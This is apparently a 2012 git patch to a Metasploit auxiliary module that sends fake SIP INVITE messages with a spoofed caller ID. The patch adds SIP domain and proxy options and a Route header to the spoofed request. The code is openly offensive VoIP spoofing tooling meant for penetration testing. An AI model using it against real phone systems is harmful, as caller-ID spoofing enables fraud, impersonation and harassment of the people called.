From 08d56e31e185346bddee5071cb738c791363ee8f Mon Sep 17 00:00:00 2001
From: Chris John Riley <chris.riley@c22.cc>
Date: Thu, 8 Nov 2012 22:38:21 +0100
Subject: [PATCH] recreated in new branch removed space at EOL

---
 modules/auxiliary/voip/sip_invite_spoof.rb | 33 ++++++++++++++++++----
 1 file changed, 28 insertions(+), 5 deletions(-)

diff --git a/modules/auxiliary/voip/sip_invite_spoof.rb b/modules/auxiliary/voip/sip_invite_spoof.rb
index ff0b9db381..b288b3f009 100644
--- a/modules/auxiliary/voip/sip_invite_spoof.rb
+++ b/modules/auxiliary/voip/sip_invite_spoof.rb
@@ -21,8 +21,8 @@ class Metasploit3 < Msf::Auxiliary
 			},
 			'Author'         =>
 				[
-					'David Maynor <dave[at]erratasec.com>',
-					'ChrisJohnRiley'
+					'David Maynor <dave[at]erratasec.com>', # original module
+					'ChrisJohnRiley' # modifications
 				],
 			'License'        =>  MSF_LICENSE
 		)
@@ -33,7 +33,13 @@ class Metasploit3 < Msf::Auxiliary
 				Opt::RPORT(5060),
 				OptString.new('SRCADDR', [true, "The sip address the spoofed call is coming from",'192.168.1.1']),
 				OptString.new('MSG', [true, "The spoofed caller id to send","The Metasploit has you"]),
-				OptString.new('EXTENSION', [false, "The specific extension or name to target", nil])
+				OptString.new('EXTENSION', [false, "The specific extension or name to target", nil]),
+				OptString.new('DOMAIN', [false, "Use a specific SIP domain", nil])
+			], self.class)
+		register_advanced_options(
+			[
+				OptAddress.new('SIP_PROXY_NAME', [false, "Use a specific SIP proxy", nil]),
+				OptPort.new('SIP_PROXY_PORT', [false, "SIP Proxy port to use", 5060])
 			], self.class)
 	end
 
@@ -45,19 +51,36 @@ class Metasploit3 < Msf::Auxiliary
 			name = datastore['MSG']
 			src = datastore['SRCADDR']
 			ext = datastore['EXTENSION']
+			dom = datastore['DOMAIN']
+			sphost = datastore['SIP_PROXY_NAME']
+			spport = datastore['SIP_PROXY_PORT'] || 5060
+			conn_string = ''
 
 			if not ext.nil? and not ext.empty?
 				# set extesion name/number
-				conn_string = "#{ext}@#{ip}"
+				conn_string = "#{ext}@"
+			end
+
+			if not dom.nil? and not dom.empty?
+				# set domain
+				conn_string << "#{dom}"
 			else
-				conn_string = "#{ip}"
+				conn_string << "#{ip}"
+			end
+
+			# set Route header if SIP_PROXY is set
+			if not sphost.nil? and not sphost.empty?
+				route = "Route: <sip:#{sphost}:#{spport};lr>\r\n"
 			end
 
 			connect_udp
 
 			print_status("Sending Fake SIP Invite to: #{conn_string}")
+			print_status("Using SIP proxy #{sphost}:#{spport}") if route
 
 			req =  "INVITE sip:#{conn_string} SIP/2.0" + "\r\n"
+			# add Route: header to req if SIP_PROXY is set
+			req << route if route
 			req << "To: <sip:#{conn_string}>" + "\r\n"
 			req << "Via: SIP/2.0/UDP #{ip}" + "\r\n"
 			req << "From: \"#{name}\"<sip:#{src}>" + "\r\n"